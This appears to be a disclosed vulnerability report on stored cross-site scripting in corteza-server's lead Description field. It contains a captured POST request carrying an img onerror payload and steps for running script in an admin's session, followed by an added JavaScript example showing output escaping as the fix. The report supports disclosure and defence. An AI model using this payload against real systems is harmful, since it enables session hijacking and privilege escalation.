Cross-site Scripting (XSS) - Stored in cortezaproject/corteza-server

Valid
Reported on Jun 10th 2021

💥 BUG

Stored XSS in the lead Description field, exploitable by a low-privileged user against the admin.

💥 TESTED VERSION

v2021.3.6

💥 IMPACT

A lower-privileged user can mount an XSS attack against the admin. The payload is stored in the record, so the attacker's JavaScript runs in the session of whoever opens that record, including the admin.
Thus a lower-privileged user who can only create leads can execute arbitrary JavaScript in the admin's session, for example to change their own role.

💥 STEPS TO REPRODUCE

1. As the admin, go to http://localhost:18080/admin/system/user and add a new user, user B.
Give user B CRM permissions so that user B can create leads.

2. Log in as user B and create a lead. Then update the lead; the following request is sent to the server:

POST /api/compose/namespace/234475729176375299/module/234475730300383235/record/235001408024358915 HTTP/1.1
Host: localhost:18080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiIyMzQ0NzU3MzExMDU2MjQwNjciLCJleHAiOjE2MjMzMDc2MDksInJvbGVzIjoiMiIsInNjb3BlIjoicHJvZmlsZSBhcGkiLCJzdWIiOiIyMzQ0NzYzMzYzOTQwMjI5MTUifQ.TQQZg4-C9195HxnwdFYWG_7dKiGGrtZCI-YwNtg4-kojdGcFK-35MrI4my7zQSMxn-ESClzplRVS2UxCbVgndg
Content-Length: 311
Origin: http://localhost:18080
Connection: close
Referer: http://localhost:18080/compose/ns/crm/pages/234475730518487043/record/235001408024358915/edit
Cookie: PHPSESSID=ktq9g4qb2bcocffq6dth0rv46l

{"values":[{"name":"Company","value":"sdfff"},{"name":"Description","value":"xss'><img src=x onerror=alert(11111)>"},{"name":"OwnerId","value":"234476336394022915"},{"name":"FirstName","value":"tettest"},{"name":"LastName","value":"test"},{"name":"RecordLabel","value":"tettest test"}],"records":[],"labels":{}}

In this POST body, set the Description field value to the XSS payload and forward the request.
The lead is updated and the payload is stored unmodified.

3. Log in as the admin and open this lead: the JavaScript executes in the admin's session.
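The following is an added example, not code from the Corteza project, showing why the Description value from the request above executes and what fixes it. It assumes the record page builds markup from the field value as raw HTML (innerHTML / v-html style); the exact rendering path in Corteza is not shown on this page. The record object and the escaping helper are constructed here for illustration.

```javascript
// Added example (not Corteza's code): contrast unsafe HTML interpolation of a
// stored record field with output escaping, using the payload from the report.

// Payload exactly as sent in the captured request above.
const DESCRIPTION_PAYLOAD = "xss'><img src=x onerror=alert(11111)>";

// Constructed record, mirroring the "values" array of the captured request.
const LEAD_RECORD = {
  Company: "sdfff",
  Description: DESCRIPTION_PAYLOAD,
  FirstName: "tettest",
  LastName: "test",
};

// Escape the characters that break out of HTML text and attribute context.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern (assumed, for illustration): the stored value is concatenated
// straight into markup, which is what assigning it to innerHTML or rendering it
// with v-html does. The attacker's <img onerror=...> becomes a live element.
function renderFieldUnsafe(name, value) {
  return `<div class="field ${name}">${value}</div>`;
}

// Hardened pattern: same markup, but the value is escaped so the browser
// treats it as text. Framework text bindings ({{ value }} in Vue) do the same.
function renderFieldSafe(name, value) {
  return `<div class="field ${escapeHtml(name)}">${escapeHtml(value)}</div>`;
}

// Render every field of a record with the given field renderer.
function renderRecord(record, renderField) {
  return Object.entries(record)
    .map(([name, value]) => renderField(name, value))
    .join("\n");
}

// Check: does the markup contain a tag carrying an on* event-handler attribute?
// In a browser that is exactly what turns stored data into executed script.
function containsEventHandler(html) {
  return /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

const unsafeHtml = renderRecord(LEAD_RECORD, renderFieldUnsafe);
const safeHtml = renderRecord(LEAD_RECORD, renderFieldSafe);
console.log(containsEventHandler(unsafeHtml)); // true: <img src=x onerror=...> survives
console.log(containsEventHandler(safeHtml));   // false: rendered as &lt;img ...&gt;
```

The check is deliberately on the output side: the server accepted and stored the raw string, which is acceptable for a free-text field, so the fix belongs where the value is rendered. Stripping tags on input would still leave other render paths (exports, emails, other clients) to audit.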

💥 VIDEO

https://drive.google.com/file/d/1cuCyzOPtBKvVGNhSLexFgEx9Vgywfkox/view?usp=sharing

💥 STUDY

https://owasp.org/www-community/attacks/xss/

https://en.wikipedia.org/wiki/Cross-site_scripting

https://www.acunetix.com/websitesecurity/cross-site-scripting/

https://www.imperva.com/learn/application-security/cross-site-scripting-xss-attacks/